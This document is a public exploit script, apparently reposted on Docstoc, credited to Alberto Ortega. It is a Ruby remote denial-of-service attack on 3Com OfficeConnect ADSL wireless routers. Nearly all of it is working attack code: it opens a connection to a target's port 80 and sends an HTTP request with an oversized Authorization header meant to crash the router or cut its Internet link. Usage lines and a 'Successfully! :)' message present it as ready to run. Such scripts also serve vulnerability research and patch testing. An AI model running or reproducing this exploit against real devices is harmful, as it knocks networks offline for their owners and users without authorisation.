Docstoc

3Com OfficeConnect Routers Remote DoS Exploit

Document Sample
3Com OfficeConnect Routers Remote DoS Exploit Powered By Docstoc
					                                   3Com OfficeConnect Routers Remote DoS Exploit                                    Page 1/1
   1   ###############
   2   # Model −> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A−72 and 3CRWDR100Y−72
   3   # Software Version −> Tested on 2.06T13 (Apr 2007, last version for these routers)
   4   # Attacker −> Tested from GNU/Linux (Sidux and Ubuntu)
   5   #
   6   # Exploit languaje −> Ruby
   7   # Type −> Remote Denial of Service Exploit by HTTP
   8   #
   9   # Additional info:
  10   # − I tested it in other similar 3Com router and the system do not crash, but the Internet connection yes.
  11   # − The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
  12   #
  13   ###############
  14   # Discovered and written by Alberto Ortega
  15   # http://pentbox.net/
  16   ###############
  17
  18   require "socket"
  19
  20   host = ARGV[0]
  21   buffer = "A"
  22   send = ""
  23
  24   puts ""
  25   if !host
  26             puts    " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
  27             puts    " Remote DoS Exploit by HTTP"
  28             puts    " −−−−−− Usage −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−"
  29             puts    " ruby 3com_dosexploit.rb host"
  30             puts    " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
  31   else
  32             begin
  33                        socket = TCPSocket.new(host, 80)
  34                        puts "− Exploiting ..."
  35                        # 8.times is enough to DoS
  36                        9.times do
  37                                 buffer = "#{buffer}#{buffer}"
  38                        end
  39                        # Here are the HTTP packet, Authorization value causes the DoS
  40                        send = "GET / HTTP/1.1\r\nAuthorization:#{buffer}\r\n"
  41                        socket.write(send)
  42                        puts "− Successfully! :)"
  43             rescue
  44                        puts "Connection problem"
  45             end
  46   end
  47   puts ""




Alberto Ortega Llamas                                                                                               12/19/2009